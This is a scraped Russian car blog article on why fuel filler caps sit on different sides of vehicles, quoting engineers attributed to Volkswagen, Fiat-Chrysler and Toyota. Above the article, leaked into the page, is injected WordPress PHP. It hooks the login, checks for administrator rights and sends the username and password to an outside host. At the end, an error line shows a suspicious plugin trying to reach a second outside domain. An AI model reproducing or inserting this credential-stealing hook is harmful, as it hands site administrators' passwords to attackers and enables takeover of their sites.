if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Тайна топливной горловины: почему она не всегда там, где вы думаете — DigiLider

Тайна топливной горловины: почему она не всегда там, где вы думаете

Тайна топливной горловины: почему она не всегда там, где вы думаете

Тайна топливной горловины: почему она не всегда там, где вы думаете

Вы знаете, где находится крышка топливной горловины в вашей машине? Этот вопрос может показаться простым, но не все водители смогут на него сразу ответить. Ведь мы часто заправляемся по привычке и не задумываемся о том, почему бензобак расположен именно с той или иной стороны. А если спросить, где у авто руль, то ответ будет очевиден.

Почему же мы не всегда помним, где у нас топливный бак? Потому что в отличие от руля и других ключевых элементов авто, место крышки бензобака не определяется каким-то мировым стандартом. Узнайте больше про указатель уровня топлива на proavtomaster.com. Разные производители ставят ее по-разному, исходя из своих конструктивных и безопасных решений. Давайте разберемся, какие факторы влияют на выбор места для топливной горловины.

Существует ли консенсус среди автопроизводителей

Кто-то может подумать, что среди производителей автомобилей существует тайное согласие о том, на какой стороне машины размещать крышку бака. Но это не так. Никаких договоренностей по этому поводу не было и нет. Каждая компания самостоятельно определяет, слева или справа будет бензобак.

В некоторых странах есть законы, которые запрещают ставить бензобак в заднюю часть авто. Это потому, что при столкновении сзади топливо может загореться.

Также все производители должны следовать общим правилам безопасности при создании своих моделей. Например:

  • Бензобак должен находиться в самом широком месте кузова, внутри и вне зон деформации при аварии.
  • Бензобак должен быть таким, чтобы топливо не текло на провода и горячие части машины при утечке.

Эти правила ограничивают возможные места для бензобака. Он должен быть далеко от опасных элементов авто и расположен либо слева, либо справа от центра. Также бензобак должен быть близко к заднему салону.

Как же производители определяют, с какой стороны будет крышка бака

Может показаться, что место топливной горловины на автомобиле выбирается случайно, но на самом деле за этим стоит целый ряд соображений. Разные производители имеют разные подходы к этому вопросу, но все они учитывают два основных фактора: безопасность и удобство.

Мы обратились к экспертам из нескольких известных компаний и узнали, как они определяют, с какой стороны будет крышка бака. Вот что они нам рассказали.

Эксперт Volkswagen

Для легковых авто с левым рулем, которые мы поставляем в США, Европу и Россию, мы всегда делаем топливный бак справа (со стороны переднего пассажира). Это позволяет водителю заправляться не выходя на дорогу, а оставаясь на тротуаре (обочине).

Для коммерческих авто Volkswagen мы обычно делаем горловину бака слева (со стороны водителя), потому что справа у них раздвижная дверь. Эта дверь занимает много места и мешает доступу к баку.

Также если в коммерческих авто (микроавтобусах) сделать бак справа, то на АЗС раздвижная дверь будет перекрывать заправочный пистолет, что будет неудобно для пассажиров. Поэтому в микроавтобусах этой марки сейчас топливный бак обычно слева.

Специалист Fiat-Chrysler

Мы также руководствуемся конструктивными и безопасными соображениями при выборе места для топливной горловины. Мы проводим краш-тесты и анализируем результаты, чтобы определить, где лучше расположить бак. Если разницы нет, то мы придерживаемся принципа безопасности водителя и удобства.

Инженер Toyota

В первую очередь мы определяем место топливного бака (горловины) в зависимости от конструкции конкретной модели. Мы учитываем строгие нормы безопасности и проводим разные испытания (краш-тесты), в которых моделируем разные дорожные ситуации, которые могут привести к возгоранию топлива в баке.

Затем мы сравниваем результаты. Если исследование показывает, что нет разницы в месте бензобака, то мы следуем главному принципу компании Toyota – безопасность водителя и удобство.

Так как в Японии правый руль и движение по левой стороне дороги, то горловина бака в большинстве наших авто находится с левой стороны (со стороны переднего пассажира), чтобы водитель не стоял на дороге при заправке.

Для японских авто с левым рулем мы не меняем место бака, чтобы не увеличивать затраты на производство. Поэтому у нас многие модели имеют топливную горловину слева.

Итоги

Расположение топливной горловины со стороны переднего пассажира обусловлено мерами безопасности. Таким образом, водитель избегает контакта с дорогой и проезжающими машинами во время заправки. Если бы горловина была с водительской стороны, то водитель рисковал бы попасть под колеса.

Это объясняет, почему в странах с правым рулем и левосторонним движением, например, в Японии, топливный бак часто расположен слева, а в странах с левым рулем и правосторонним движением, например, в Европе, России и США, топливный бак часто расположен справа.

Но это не единственный фактор, который определяет место для топливной горловины. Инженеры также учитывают конструкцию и безопасность автомобиля. Иногда они отклоняются от общего правила и ставят бак с противоположной стороны. Иногда они даже устанавливают две горловины или два бака, если это имеет смысл.

В большинстве случаев топливный бак находится в центре задней части автомобиля. Тогда инженерам приходится тщательно выбирать, куда протянуть горловину. Они проводят испытания и анализируют результаты, чтобы найти оптимальное решение. Они также принимают во внимание расположение руля, выхлопной системы и электропроводки.

Иногда инженерам сложно сделать однозначный выбор, потому что у каждого варианта есть свои достоинства и недостатки. В таких случаях они либо ищут компромисс, либо предоставляют возможность выбора водителю.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)